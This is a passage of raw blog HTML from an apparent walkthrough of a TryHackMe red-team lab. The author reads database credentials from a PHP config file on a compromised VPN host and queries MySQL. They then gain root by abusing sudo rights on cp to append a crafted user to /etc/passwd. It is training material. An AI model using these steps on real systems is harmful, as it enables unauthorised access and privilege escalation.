srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1024%2C246&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=300%2C72&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=768%2C184&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1536%2C368&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?w=1943&amp;ssl=1 1943w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! We got the shell on the VPN machine. 
<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"22-connecting-to-mysql-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Connecting to MySQL<\/mark><\/h4>\n\n\n\n<p>In the <code>\/var\/www\/html<\/code> directory, we notice a database connection configuration file. Such files contain database credentials. Reading the file, we find the credentials for connecting to the MySQL server.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"www-data@ip-10-200-113-12:\/var\/www\/html$ cat db_connect.php \n&lt;?php\n\ndefine('DB_SRV', 'localhost');\ndefine('DB_PASSWD', &quot;password1!&quot;);\ndefine('DB_USER', 'vpn');\ndefine('DB_NAME', 'vpn');\n\n$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);\n\nif($connection == false){\n\n\tdie(&quot;Error: Connection to Database could not be made.&quot; 
. mysqli_connect_error());\n}\n?&gt;\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">www-data@ip-10-200-113-12:\/var\/www\/html$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">db_connect.php<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #BABED8\">php<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_SRV&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">localhost<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_PASSWD&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password1!<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_USER&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">define(<\/span><span style=\"color: #FFCB6B\">&#39;DB_NAME&#39;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$connection = mysqli_connect<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DB_SRV,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_USER,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_PASSWD,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DB_NAME<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">$connection == false<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">die(<\/span><span 
style=\"color: #FFCB6B\">&quot;Error: Connection to Database could not be made.&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysqli_connect_error<\/span><span style=\"color: #89DDFF\">()<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910c5bb&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910c5bb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"426\" data-attachment-id=\"479\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143435\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?fit=1407%2C586&amp;ssl=1\" data-orig-size=\"1407,586\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143435\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?fit=1024%2C426&amp;ssl=1\" 
data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=1024%2C426&#038;ssl=1\" alt=\"\" class=\"wp-image-479\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=1024%2C426&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=300%2C125&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?resize=768%2C320&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143435.png?w=1407&amp;ssl=1 1407w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>From the VPN machine itself, we can connect via MySQL and check out the database.<\/p>\n\n\n\n<div 
style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"www-data@ip-10-200-113-12:\/var\/www\/html$ mysql -u vpn -p\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: 
#FFCB6B\">www-data@ip-10-200-113-12:\/var\/www\/html$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>vpn<\/code> database has a <code>users<\/code> table that contains a set of credentials for the user <code>lisa.moore<\/code>. We will add these credentials to our list of found credentials and use them later if needed.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910dad8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910dad8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" data-attachment-id=\"480\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206163250\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?fit=1217%2C725&amp;ssl=1\" data-orig-size=\"1217,725\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206163250\" 
data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?fit=1024%2C610&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=1024%2C610&#038;ssl=1\" alt=\"\" class=\"wp-image-480\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=1024%2C610&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=300%2C179&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?resize=768%2C458&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206163250.png?w=1217&amp;ssl=1 1217w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" 
\/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"23-privilege-escalation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h4>\n\n\n\n<p>The VPN machine is our foothold on the network. We can set up pivoting and interact with the machines on the internal network directly from our Kali (attack) machine. Getting <code>root<\/code> access will give us elevated privileges on the machine and, if needed, we will be able to install, compile, and run tools without any restrictions.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>For pivoting, privilege escalation is not required. We will try to compromise as much as we can to showcase the vulnerabilities and misconfigurations on the machine.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Checking the <code>SUDO<\/code> permissions, we notice that the user <code>www-data<\/code> can run a bash script and the <code>cp<\/code> binary with elevated access. 
We can make use of this to our advantage and get root access.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910eb5e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910eb5e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" data-attachment-id=\"481\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143634\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?fit=1536%2C243&amp;ssl=1\" data-orig-size=\"1536,243\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143634\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?fit=1024%2C162&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=1024%2C162&#038;ssl=1\" alt=\"\" class=\"wp-image-481\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=1024%2C162&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=300%2C47&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?resize=768%2C122&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143634.png?w=1536&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>cp<\/code> binary is used to copy files. We are currently the <code>www-data<\/code> user, which is a default user for web servers and does not have any elevated privileges by default. But with SUDO permissions on the cp binary, we can copy any files that only the root user can access and read them.<\/p>\n\n\n\n<p>One easy way to become root on the machine using the SUDO permissions on <code>\/bin\/cp<\/code> is to modify the <code>\/etc\/passwd<\/code> file. 
We will first copy the passwd file to the <code>\/tmp<\/code> directory, add our own user with root privileges, and then copy the file back to its original path.<\/p>\n\n\n\n<p>We will create a hash in the format that is required by the <code>passwd<\/code> file.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">openssl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-salt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ignite<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">pass123<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8; font-style: italic\">$1<\/span><span style=\"color: #BABED8\">$ignite$3eTbJm98O9Hz.k1NTdNxe1<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Now, we append our user hash to the <code>passwd<\/code> file:<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910f70c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910f70c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"373\" data-attachment-id=\"482\" 
data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151041\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?fit=1149%2C418&amp;ssl=1\" data-orig-size=\"1149,418\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151041\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?fit=1024%2C373&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=1024%2C373&#038;ssl=1\" alt=\"\" class=\"wp-image-482\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=1024%2C373&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=300%2C109&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=768%2C279&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?w=1149&amp;ssl=1 1149w\" 
